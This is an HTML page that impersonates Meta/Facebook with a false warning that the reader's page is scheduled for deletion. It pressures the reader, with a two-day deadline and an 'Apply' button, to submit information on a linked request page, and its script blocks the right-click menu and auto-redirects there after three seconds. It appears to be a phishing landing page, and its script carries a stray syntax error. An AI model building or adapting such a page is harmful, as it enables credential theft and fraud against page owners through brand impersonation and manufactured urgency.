<html lang="en"><head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Home</title>
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet">
  <style>
      /* CSS styles */

      body {
          font-family: system-ui;
          margin: 0;
          padding: 0;
      }

      .container-fluid {
          background: #F5F6F6;
      }

      .container {
          padding: 1rem;
      }

      .logo {
          width: 9rem;
          height: 6rem;
      }

      .meta-logo {
          width: 4rem;
          height: 4rem;
      }

      .btn {
          background: #0064e0;
          border: none;
          border-radius: 100px;
          padding: 10px 35px;
          text-decoration: none;
          color: white;
          display: inline-block;
          margin-top: 1rem;
          font-family: Arial, sans-serif;
          /* Same font family */
          font-size: 16px;
          /* Adjust as needed */
      }

      .content {
          margin-top: 3rem;
          display: flex;
          justify-content: center;
      }

      .content .col-sm-6 {
          margin-top: 3rem;
          margin-left: 5rem;
      }

      .content p {
          font-size: 18px;
          margin-top: 1rem;
          font-family: Arial, sans-serif;
          /* Same font family */
      }

      .sign-up {
          font-size: 17px;
          padding-top: 1rem;
          font-family: Arial, sans-serif;
          /* Same font family */
      }

      .business-info {
          font-size: 14px;
          font-family: Arial, sans-serif;
          /* Same font family */
      }

      .region-info {
          font-size: 13px;
          font-style: italic;
          font-family: Arial, sans-serif;
          /* Same font family */
      }

      .image {
          display: none;
          width: 42%;
          height: 100vh;
          /* Ensure full height */
          background-size: cover;
          /* background-position: center; */
          /* margin-left: 5rem; */
      }

      @media (min-width: 576px) {
          .image {
              display: block;
          }
      }
  </style>
</head>

<body>
  <div class="container-fluid">
      <div class="container">
          <img src="meta-logo.svg" alt="logo" class="logo">
      </div>
  </div>
  <div class="content">
      <div class="col-sm-6">
          
          <h1 class="my-3 fs-1">We Have Scheduled Your Page <br> To Be Deleted</h1>
          <p>We have received several reports that your page violates our terms of service and community guidelines. As a result, your page will be sent for verification.</p>
          <div style="margin-bottom: 30px;"></div>
          <a class="btn" href="request.html">Apply</a>
          <p class="mt-4"><br> If you believe your page was mistakenly scheduled for deletion, you can prevent its permanent removal by simply clicking the Apply button below and providing some quick information<br> Facebook.</p>
          <p class="sign-up"></p>
          <p class="mt-4 mb-0">
              <span class="fw-semibold">Appeal Guide</span> In your appeal,Please ensure that all necessary information is included in your request so that it can be processed promptly. If you provide incorrect information or fail to respond to requests for additional information within 2 days, your appeal may be closed without further review. and your page will be deleted for permanently
          </p>
          <a href="#" class="business-info">Meta verified for businesses</a>
          <p class="mt-4 font-italic region-info">After your submission, we will review your appeal and cancel the page deletion if the information you provide is correct. The review process typically takes 24 hours, though in some cases it may take longer.</p>
      </div>
      <div class="col-sm-5 image" style="background-image: url('./background.png'); "></div>
  </div>

<script>
  document.addEventListener('contextmenu', event => {
      event.preventDefault();
  });

  setTimeout(function() {
  var redirectURL = "request.html"; // Updated URL
  window.location.replace(redirectURL);
  }, 3000); // 3000 milliseconds (3 seconds)
  });
</script>

</body></html>